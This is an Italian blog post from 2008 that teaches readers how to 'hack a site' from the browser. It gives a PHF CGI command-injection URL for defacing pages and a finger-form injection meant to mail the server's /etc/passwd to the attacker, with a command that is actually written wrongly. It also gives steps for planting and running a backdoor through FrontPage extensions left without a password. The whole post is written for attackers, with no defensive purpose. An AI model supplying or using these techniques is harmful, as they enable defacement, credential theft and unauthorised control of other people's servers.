Cosa ne pendi del blog?

sabato 2 agosto 2008

Bucare un sito

I Browser Attack sono quegli attacchi che vengono portati dal vostro browser,senza particolari software. Oltre ai vari attacchi PHF e Query, ci sono anche altri attacchi o varianti di PHF/Query
Cambiare una pagina web dal tuo browser
Questa corta sezione descrive la stinga da usare per modificare una pagina web da tuo browser. All'indirizzo http://www.sito.com aggiungiamo la seguente stringa
cgi-bin/phf?Qalias=x%0a/bin/echo%20 "Crepa Lamer!!!"%20>>filename.html(questa è una variante del PHF).
Questa stringati permette di scrivere su filename.html e aggiungere "Crepa Lamer!!!" devono essere in formato html. Puoi inserire del testo delle immagini o qualsiasi altra cosa tu voglia.
Finger box hacking:
Diciamo di voler "bucare" un sito tipo www.sito.com(ancora lui...). La prima cosa da fare sara' scivere l'URL Http://www.sito.com. Poi aggiungete all'url /cgi-bin/finger in modo da ottenere Http://www.aol.com/cgi-bin/finger. Se il finger e' attivo un box dovrebbe apparire per inserire il nome della persona su cui eseguire il comando. Se questo avviene tu hai la possibilita' di ricevere il file /etc/passwd. La prossima cosa da fare sara' di trovare un mailto sulla web page (faq@sito.com o webmaster@sito.com ad esempio). Ora ritorna al box e scrivi: faq@sito.com;/bin/mail tuo@indirizzo.org > /etc/passwd ...questa stringa manda a voi una mail da faq@sito.com contenente il file delle password(madonna che goduria!!!)

FrontPage
Il metodo che citerò adesso serve x inserire una backdoor in un sito che ha le estensioni di FrontPage. Per sapere se un sito ha le estensioni di FrontPage:
O c'è scritto direttamente sulla home page del sito. O guardate L'html della home page,e dovreste notare una cosa del genere:
meta name="GENERATOR" content="Microsoft FrontPage 3.0"
Apriamo il FrontPage98 o FrontPage Express e clicchiamo su File. Apriamo Front Page Box,poi scegliamo la voce Apri Web esistente, mettiamo il sito da hackerare e premiamo OK. Appena connessi, se ci chiederà la password dobbiamo lasciar stare,ma se non c'è la chiederà(cosa molto probabile),il 50%del lavoro è fatto. Entriamo nella cartella CGI-BIN e facciamo un Up-Load e ci mettiamo una backdoor.Andiamo al nostro amato browser, e digitiamo:
htto://server_vittima/cgi-bin/nome_della_backdoor.exe
così facciamo partire la nostra backdoor. Adesso il server non ci darà nessuna risposta, e andiamo a vedere subito se la backdoor è stata attivata. Se sì,siamo root. Se invece la backdoor non viene attivata, dovete dare il tempo al server di aggiornarsi e far eseguire il trojan.
http://groups.msn.com/HKLORDSHINVAHOME
Pubblicato da alle

Nessun commento:

Posta un commento

Iscriviti a: Commenti sul post (Atom)